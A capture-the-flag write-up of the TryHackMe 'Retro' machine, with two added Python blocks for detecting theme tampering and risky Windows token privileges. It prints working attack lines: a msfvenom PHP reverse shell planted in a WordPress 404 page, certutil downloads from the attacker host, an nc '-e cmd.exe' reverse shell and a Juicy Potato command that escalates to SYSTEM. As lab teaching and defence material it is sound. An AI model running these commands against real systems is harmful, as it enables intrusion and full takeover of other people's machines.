Writeup Tryhackme Retro
Writeup about the Tryhackme machine Retro.
0 - Basic info
Unknown machine, black box
1 - Reconnaissance and enumeration
nmap -p- --open -T5 -v 10.10.π -n -Pn -oG ports.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-14 19:56 CEST
Initiating Connect Scan at 19:56
Scanning 10.10.π [65535 ports]
Discovered open port 3389/tcp on 10.10.π
Discovered open port 80/tcp on 10.10.π
Connect Scan Timing: About 23.38% done; ETC: 19:58 (0:01:42 remaining)
Connect Scan Timing: About 63.55% done; ETC: 19:58 (0:00:35 remaining)
Completed Connect Scan at 19:58, 97.12s elapsed (65535 total ports)
Nmap scan report for 10.10.π
Host is up (0.039s latency).
Not shown: 65533 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 97.31 seconds
Ports 80 and 3389 are open. Port 80 is served by IIS.
Enumerating port 80 with gobuster:
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.π
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.π
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/14 19:57:37 Starting gobuster in directory enumeration mode
===============================================================
/retro (Status: 301) [Size: 149] [--> http://10.10.π/retro/]
/Retro (Status: 301) [Size: 149] [--> http://10.10.π/Retro/]
On the URL path /retro there is a retro game museum:
There is a tempting link to upload images, but be careful: it does not point to the Retro machine.
It is also running WordPress: http://10.10.π/retro/wp-login.php
2 - Vulnerability Identification
Wade is a valid user:
This also looks like a password…
It worked, so I have a valid login to the WordPress admin panel:
Checking for more users:
3 - Exploit
As always when I get access to a WordPress admin panel, I try to place the reverse shell/webshell in the theme's 404 page:
I used msfvenom to generate a PHP reverse shell:
msfvenom -a php --platform php -p php/reverse_php LHOST=10.10.π LPORT=8080 -o shell.php
No encoder specified, outputting raw payload
Payload size: 3040 bytes
Saved as: shell.php
I placed the code in the 404.php page and used an obviously non-existent URL path to trigger the shell:
http://10.10.π/retro/index.php/2019/12/09/hello-world/awesome
It worked, so I got the reverse shell:
rlwrap -r nc -lvp 8080
listening on [any] 8080 ...
10.10.π: inverse host lookup failed: Unknown host
connect to [10.10.π] from (UNKNOWN) [10.10.π] 50481
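From the defender's side, what happened above is a modification of a theme file through the WordPress admin panel, and a plain integrity check catches it. The following is an added example, not code from the writeup: it compares a theme directory against a baseline of known-good sha256 hashes and flags PHP calls a template should never contain. The theme path, file contents and baseline are constructed placeholders.

```python
import hashlib
import re

# Constructed sample (not from the machine): a clean 404.php, the same file
# after a PHP reverse shell has been pasted in, and a baseline of sha256
# hashes taken from a clean copy of the theme. Paths are placeholders.
CLEAN_404 = b"<?php get_header(); ?>\n<h1>Page not found</h1>\n<?php get_footer(); ?>\n"
INDEX = b"<?php get_header(); get_footer(); ?>\n"
TAMPERED_404 = (b"<?php $s = fsockopen('ATTACKER_IP', 8080); "
                b"$p = proc_open('cmd', [], $pipes); ?>\n" + CLEAN_404)
THEME = "wp-content/themes/THEME_NAME/"
BASELINE = {THEME + "404.php": hashlib.sha256(CLEAN_404).hexdigest(),
            THEME + "index.php": hashlib.sha256(INDEX).hexdigest()}
CURRENT = {THEME + "404.php": TAMPERED_404, THEME + "index.php": INDEX}

# Calls a theme template has no business making; msfvenom's php/reverse_php
# needs a socket plus one of the process-spawning functions.
SUSPICIOUS = re.compile(rb"\b(fsockopen|proc_open|popen|shell_exec|passthru|eval)\s*\(")

def audit_theme(baseline, current):
    """Return {path: [reasons]} for files that changed, appeared, vanished
    or contain suspicious PHP calls; an empty dict means the theme is clean."""
    findings = {}
    for path, data in current.items():
        reasons = []
        if path not in baseline:
            reasons.append("not in baseline")
        elif hashlib.sha256(data).hexdigest() != baseline[path]:
            reasons.append("hash mismatch")
        calls = sorted({m.group(1).decode() for m in SUSPICIOUS.finditer(data)})
        if calls:
            reasons.append("suspicious calls: " + ", ".join(calls))
        if reasons:
            findings[path] = reasons
    for path in baseline.keys() - current.keys():
        findings[path] = ["missing"]
    return findings

if __name__ == "__main__":
    for path, reasons in audit_theme(BASELINE, CURRENT).items():
        print(path, "->", "; ".join(reasons))
```

Run it periodically against the live theme directory and alert on any non-empty result; the hash check alone already catches the 404.php edit, the call scan explains why it matters.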
4 - Post-Exploitation and privilege escalation
Now it is time to get root. After some time enumerating I found this:
whoami /all
USER INFORMATION
----------------

User Name         SID
================= ===============================================================
iis apppool\retro S-1-5-82-3788814120-2795558051-4026253505-1810414383-1644260341

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
Mandatory Label\High Mandatory Level Label            S-1-16-12288
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE                 Well-known group S-1-5-6      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
                                     Unknown SID type S-1-5-82-0   Mandatory group, Enabled by default, Enabled group

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
ERROR: Unable to get user claims information.
SeImpersonatePrivilege is enabled, so it looks like the box is vulnerable to Juicy Potato:
https://github.com/ohpe/juicy-potato
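The same whoami /all output is what a defender would audit: an IIS application-pool identity holding SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege is the precondition for this whole class of token abuse. This added example (not part of the writeup) parses that output and lists the token privileges such a service account should not hold; the embedded sample is the output quoted above, trimmed to the user and privilege tables.

```python
import re

# Constructed sample: the `whoami /all` output quoted above, trimmed to the
# user and privilege tables (the group table is not needed for this check).
SAMPLE_WHOAMI = """\
USER INFORMATION
----------------
User Name         SID
================= ===============================================================
iis apppool\\retro S-1-5-82-3788814120-2795558051-4026253505-1810414383-1644260341
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""

# Privileges that let a process run code under another account's token.
# "Disabled" still matters: a token that holds a privilege can re-enable it.
TOKEN_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

def sections(text):
    """Split whoami /all output into {"USER INFORMATION": [data lines], ...}."""
    out, current = {}, None
    for line in text.splitlines():
        if line.endswith("INFORMATION"):
            current = line
            out[current] = []
        elif current and line.strip() and set(line) - {"-", "=", " "}:
            out[current].append(line)  # skips blank and separator lines
    return out

def parse_user(text):
    """Return (account, sid) from the USER INFORMATION table, or None."""
    rows = (re.match(r"^(.+?)\s+(S-1-\S+)$", l) for l in sections(text).get("USER INFORMATION", []))
    return next((m.groups() for m in rows if m), None)

def parse_privileges(text):
    """Return {privilege: state} from the PRIVILEGES INFORMATION table."""
    rows = (re.match(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$", l)
            for l in sections(text).get("PRIVILEGES INFORMATION", []))
    return {m.group(1): m.group(2) for m in rows if m}

def risky_token_privileges(text):
    """(privilege, state) pairs an IIS app-pool or service account should not hold."""
    return sorted((p, s) for p, s in parse_privileges(text).items() if p in TOKEN_PRIVS)
```

The fix on the hardening side is to run the application pool under an identity that does not carry these privileges, or to remove them with a local security policy, rather than to rely on the service never being compromised.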
Setting up what is needed: downloading nc, JuicyPotato and a bat script that triggers the nc reverse shell once the Windows exploit runs:
certutil.exe -urlcache -f http://10.10.π:7777/JuicyPotato.exe C:\Windows\Temp\JuicyPotato.exe
certutil.exe -urlcache -f http://10.10.π:7777/nc64.exe C:\Windows\Temp\nc.exe
certutil.exe -urlcache -f http://10.10.π:7777/bat.bat C:\Windows\Temp\bat.bat
The bat script contains a simple nc reverse shell:
C:\Windows\Temp\nc.exe -e cmd.exe 10.10.π 443
A valid CLSID is required; I used one from the default list:
https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2016_Standard
XblGameSave {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
C:\Windows\Temp\JuicyPotato.exe -p C:\Windows\Temp\bat.bat -l 1337 -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 1337
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
Listening on my machine:
rlwrap -r nc -lvp 443
Finally rooted, and taking the flags:
 Directory of C:\Users\Administrator\Desktop

12/08/2019  09:06 PM    <DIR>          .
12/08/2019  09:06 PM    <DIR>          ..
12/08/2019  09:08 PM                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30,402,187,264 bytes free

type root.txt.txt
7958π
 Directory of C:\Users\Wade\Desktop

12/08/2019  09:09 PM    <DIR>          .
12/08/2019  09:09 PM    <DIR>          ..
12/08/2019  09:09 PM                32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30,402,187,264 bytes free

type user.txt.txt
3b99π
Thanks for reading!